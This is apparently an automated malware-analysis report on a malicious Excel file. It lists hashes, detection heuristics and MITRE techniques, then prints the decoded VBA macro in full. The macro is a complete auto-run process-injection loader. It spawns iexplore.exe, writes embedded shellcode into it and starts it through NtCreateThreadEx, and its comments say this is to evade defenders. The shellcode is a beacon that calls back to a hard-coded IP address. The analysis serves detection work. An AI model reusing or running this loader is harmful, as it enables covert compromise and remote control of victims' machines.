Office (OLE) malware analysis — malicious · ac2fa4596fd77c0a

MALICIOUS

Office (OLE)

161.5 KB Created: 2019-02-06 12:39:16 Authoring application: Microsoft Excel First seen: 2019-05-31

MD5: bd24b69ad15cf7afc15100f61d54f948 SHA-1: dc66f7ca3e54b93e174212765cf75c156eae803c SHA-256: ac2fa4596fd77c0a2216afb06cb85c3e19672fb8a125244d86c712fab8922cdc

286 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1055.012 Process Injection

The file is an Excel document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. Heuristics indicate the use of CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread APIs, suggesting the macro attempts to inject and execute a payload. The script itself references 'wepwnise' and mentions a 'raw beacon payload', indicating it's designed to download and run a secondary malicious component. The script also contains API calls for process injection and execution.

Heuristics 10

ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY

Reference to WriteProcessMemory API
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD

Reference to CreateRemoteThread API
Reference to CreateProcess API high SC_STR_CREATEPROCESS

Reference to CreateProcess API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
Run
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Private Sub Workbook_Open()
Run
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
End Sub
Sub Auto_Open()
Run
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://github.com/mwrlabs/wepwnise In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23679 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23679 bytes
SHA-256: `689345baedbcbb4925e4b77d2e41c352e66e794c80db58b87854329d905c5245`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" ' This script is taken from wepwnise from mwrlabs @ https://github.com/mwrlabs/wepwnise ' Replaced CreateRemoteThread with NtCreateThreadEx to bypass Blue Team IoC ' Payload is raw beacon payload for TundraGale ' 32 Bit API call and payload needs testing ' Binary launched can be modified Private Const PROCESS_ALL_ACCESS = &H1F0FFF Private Const MEM_COMMIT = &H1000 Private Const MEM_RELEASE = &H8000 Private Const PAGE_READWRITE = &H40 Private Const HKEY_LOCAL_MACHINE = &H80000002 Private Const PROCESSOR_ARCHITECTURE_AMD64 = 9 Private Const GENERIC_ALL = &H10000000 Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type #If VBA7 Then 'x64 office Private Declare PtrSafe Function ntCreateThreadEx Lib "ntdll" Alias "NtCreateThreadEx" (ByRef lpThreadId As LongPtr, ByRef accessMask As Long, ByRef objAttributes As Any, ByVal hProcess As Long, ByVal lpStartAddress As LongPtr, ByVal lpParameter As Any, ByVal createSuspended As Long, ByVal lpStackZero As Long, ByVal lpStackSizeCommit As Long, ByVal lpStackReserved As Long, threadInfo As Any) As Long Private Declare PtrSafe Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As LongPtr Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As LongPtr Private Declare PtrSafe Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO) Private Declare PtrSafe Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As LongPtr Private Declare PtrSafe Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As LongPtr, ByRef Wow64Process As Boolean) As Boolean Private Declare PtrSafe Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer dwPageSize As Long lpMinimumApplicationAddress As LongPtr lpMaximumApplicationAddress As LongPtr dwActiveProcessorMask As LongPtr dwNumberOrfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long wProcessorLevel As Integer wProcessorRevision As Integer End Type #Else Private Declare Function ntCreateThreadEx Lib "ntdll.dll" Alias "NtCreateThreadEx" (ByVal lpThreadId as LongPtr, ByVal accessMask as Any, ByRef objectAttributes as Any, ByVal hProcess as Long, ByVal lpStartAddress As LongPtr, lpParameter As Any, ByVal createSuspended as Boolean, lpStackZero as Long, lpStackSizeCommit as Long, lpStackReserved as long, threadInfo as Any) as Long Private Declare Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean Private Declare Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long Private Declare Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long Private Declare Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long Private Declare Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO) Private Declare Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As Long Private Declare Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As Long, ByRef Wow64Process As Boolean) As Boolean Private Declare Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer dwPageSize As Long lpMinimumApplicationAddress As Long lpMaximumApplicationAddress As Long dwActiveProcessorMask As Long dwNumberOrfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long dwReserved As Long End Type #End If Dim inject64 As Boolean Public Function IsOffice64Bit() As Boolean Dim lpSystemInfo As SYSTEM_INFO Call getSysInfo(lpSystemInfo) If lpSystemInfo.wProcessorArchitecture = PROCESSOR_ARCHITECTURE_AMD64 Then Call is64Proc(getCurrProc(), IsOffice64Bit) IsOffice64Bit = Not IsOffice64Bit End If End Function Public Function IsWow64(handle As Long) As Boolean Call is64Proc(handle, t) IsWow64 = Not t End Function Public Function getList() As String() Dim myList As String ' list of binaries to try myList = "" myList = myList & "C:\Windows\System32\iexplore.exe" & "," myList = myList & "C:\Windows\SysWOW64\iexplore.exe" & "," myArray = Split(myList, ",") Dim c As Integer Dim list() As String For c = LBound(myArray) To (UBound(myArray) - 1) ReDim Preserve list(c) list(c) = myArray(c) Next getList = list End Function Public Function Run() As Long myArray = getList Dim Count As Integer Dim Success As Integer For Count = LBound(myArray) To UBound(myArray) Dim proc As String proc = myArray(Count) Success = Inject(proc) If Success = 1 Then Exit For Next End Function Public Function Inject(processCmd As String) As Long Dim myByte As Long, buf As Variant, myCount As Long, hProcess As Long #If VBA7 Then Dim lLinkToLibary As Long, comp As LongPtr, hThread As LongPtr #Else Dim lLinkToLibary As Long, comp As Long, hThread As Long #End If Dim pInfo As PROCESS_INFORMATION Dim sInfo As STARTUPINFO Dim sNull As String Dim sProc As String sInfo.dwFlags = 1 If IsOffice64Bit Then On Error Resume Next sProc = processCmd ' Spawn process res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo) hProcess = pInfo.hProcess Dim b64 As Boolean b64 = False b64 = IsWow64(hProcess) inject64 = True If b64 = True Then If inject64 = True Then If hProcess = 0 Then Exit Function End If '//function definition for VirtualAllocEx 'LPVOID VirtualAllocEx( ' HANDLE hProcess, ' LPVOID lpAddress, ' SIZE_T dwSize, // Size of the byte array below ' DWORD flAllocationType, ' DWORD flProtect '); lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H3BB, &H3000, PAGE_READWRITE) If lLinkToLibrary = 0 Then term = terminateProcess(hProcess, leave_func) ' bail Exit Function End If Position = lLinkToLibrary ' 64 bit payload buf = Array(72, 131, 228, 240, 232, 200, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, 210, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 139, 114, 80, 72, 15, 183, 74, 74, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, 11, 2, 117, 114, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 80, 139, 72, _ 24, 68, 139, 64, 32, 73, 1, 208, 227, 86, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 77, 49, 201, 72, 49, 192, 172, 65, 193, 201, 13, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, 208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, _ 72, 139, 18, 233, 79, 255, 255, 255, 93, 106, 0, 73, 190, 119, 105, 110, 105, 110, 101, 116, 0, 65, 86, 73, 137, 230, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 72, 49, 201, 72, 49, 210, 77, 49, 192, 77, 49, 201, 65, 80, 65, 80, 65, 186, 58, 86, 121, 167, 255, 213, 233, 147, 0, 0, 0, 90, 72, 137, 193, 65, 184, 187, 1, 0, 0, 77, 49, 201, 65, 81, 65, 81, 106, 3, 65, 81, 65, 186, 87, 137, 159, 198, 255, 213, 235, 121, 91, 72, 137, _ 193, 72, 49, 210, 73, 137, 216, 77, 49, 201, 82, 104, 0, 50, 160, 132, 82, 82, 65, 186, 235, 85, 46, 59, 255, 213, 72, 137, 198, 72, 131, 195, 80, 106, 10, 95, 72, 137, 241, 186, 31, 0, 0, 0, 106, 0, 104, 128, 51, 0, 0, 73, 137, 224, 65, 185, 4, 0, 0, 0, 65, 186, 117, 70, 158, 134, 255, 213, 72, 137, 241, 72, 137, 218, 73, 199, 192, 255, 255, 255, 255, 77, 49, 201, 82, 82, 65, 186, 45, 6, 24, 123, 255, 213, 133, 192, 15, 133, 157, 1, _ 0, 0, 72, 255, 207, 15, 132, 140, 1, 0, 0, 235, 179, 233, 228, 1, 0, 0, 232, 130, 255, 255, 255, 47, 81, 66, 100, 102, 0, 27, 33, 58, 1, 183, 209, 29, 42, 124, 97, 241, 214, 82, 48, 8, 253, 204, 103, 26, 114, 91, 72, 198, 51, 7, 51, 251, 22, 54, 4, 60, 169, 253, 130, 97, 70, 109, 163, 119, 171, 238, 224, 219, 56, 39, 67, 50, 44, 206, 6, 171, 248, 101, 122, 169, 174, 190, 216, 202, 224, 175, 192, 201, 137, 225, 178, 48, 193, 44, 48, 238, _ 236, 100, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 219, 247, 132, 185, 202, 195, 106, 44, 187, 212, 64, 110, 172, _ 139, 22, 10, 192, 217, 24, 178, 100, 178, 88, 185, 187, 18, 143, 149, 31, 175, 186, 35, 154, 20, 184, 151, 18, 224, 131, 176, 15, 187, 93, 243, 246, 112, 68, 106, 133, 143, 77, 7, 8, 254, 32, 131, 225, 169, 35, 164, 238, 154, 136, 83, 192, 85, 25, 136, 138, 97, 197, 146, 96, 147, 58, 226, 177, 2, 3, 65, 109, 197, 104, 174, 181, 188, 47, 107, 239, 17, 226, 200, 143, 21, 38, 243, 159, 124, 211, 195, 252, 106, 88, 213, 169, 128, 124, 191, 56, 223, 44, 10, 33, _ 195, 12, 225, 25, 82, 249, 128, 142, 136, 94, 195, 188, 189, 235, 78, 111, 158, 44, 123, 10, 145, 8, 57, 113, 139, 6, 94, 31, 71, 90, 4, 126, 6, 229, 1, 50, 47, 205, 65, 67, 130, 68, 64, 234, 16, 132, 143, 10, 25, 182, 96, 247, 210, 25, 238, 30, 194, 216, 35, 238, 237, 237, 122, 205, 51, 38, 73, 25, 113, 235, 94, 105, 117, 122, 29, 63, 163, 204, 124, 30, 79, 27, 201, 253, 179, 57, 181, 52, 0, 103, 59, 103, 237, 100, 49, 5, 120, 250, 203, 221, _ 86, 125, 243, 222, 225, 196, 0, 65, 190, 240, 181, 162, 86, 255, 213, 72, 49, 201, 186, 0, 0, 64, 0, 65, 184, 0, 16, 0, 0, 65, 185, 64, 0, 0, 0, 65, 186, 88, 164, 83, 229, 255, 213, 72, 147, 83, 83, 72, 137, 231, 72, 137, 241, 72, 137, 218, 65, 184, 0, 32, 0, 0, 73, 137, 249, 65, 186, 18, 150, 137, 226, 255, 213, 72, 131, 196, 32, 133, 192, 116, 182, 102, 139, 7, 72, 1, 195, 133, 192, 117, 215, 88, 88, 88, 72, 5, 0, 0, 0, 0, _ 80, 195, 232, 127, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155) For myCount = LBound(buf) To UBound(buf) myByte = buf(myCount) '//function definition for WriteProcessMemory (documented WinAPI) 'BOOL WriteProcessMemory( ' HANDLE hProcess, ' LPVOID lpBaseAddress, ' LPCVOID lpBuffer, ' SIZE_T nSize, ' SIZE_T lpNumberOfBytesWritten '); comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b) Next myCount '//function definition for NtCreateThreadEx (undocumented WinAPI) 'typedef NTSTATUS(WINAPI pNtCreateThreadEx)( ' OUT PHANDLE hThread, ' IN ACCESS_MASK DesiredAccess, ' IN LPVOID ObjectAttributes, ' IN HANDLE ProcessHandle, ' IN LPTHREAD_START_ROUTINE lpStartAddress, ' IN LPVOID lpParameter, ' IN SIZE_T CreateSuspended, //(BOOL) ' IN SIZE_T StackZeroBits, ' IN SIZE_T SizeOfStackCommit, ' IN SIZE_T SizeOfStackReserve, ' OUT LPVOID lpBytesBuffer retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&) End If If hThread = 0 Or inject64 = False Then If lLinkToLibrary <> 0 Then virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE End If hProcess = pInfo.hProcess term = terminateProcess(hProcess, leave_func) Exit Function Else Inject = 1 'Success End If Else If hProcess = 0 Then Exit Function End If lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE) If lLinkToLibrary = 0 Then term = terminateProcess(hProcess, leave_func) Exit Function End If Position = lLinkToLibrary ' 32bit payload buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _ 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _ 104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _ 213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _ 174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _ 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _ 113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _ 235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _ 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155) For myCount = LBound(buf) To UBound(buf) myByte = buf(myCount) comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b) Next myCount retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&) If hThread = 0 Then If lLinkToLibrary <> 0 Then virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE End If hProcess = pInfo.hProcess term = terminateProcess(hProcess, leave_func) Exit Function Else Inject = 1 'Success End If End If Else sProc = processCmd res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo) hProcess = pInfo.hProcess If hProcess = 0 Then Exit Function End If lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE) If lLinkToLibrary = 0 Then term = terminateProcess(hProcess, leave_func) Exit Function End If Position = lLinkToLibrary ' 32bit payload buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _ 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _ 104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _ 213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _ 174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _ 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _ 113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _ 235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _ 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155) For myCount = LBound(buf) To UBound(buf) myByte = buf(myCount) comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b) Next myCount retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&) If hThread = 0 Then If lLinkToLibrary <> 0 Then virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE End If hProcess = pInfo.hProcess term = terminateProcess(hProcess, leave_func) Exit Function Else Inject = 1 'Success End If End If End Function Sub AutoOpen() Run End Sub Private Sub Workbook_Open() Run End Sub Sub Auto_Open() Run End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute 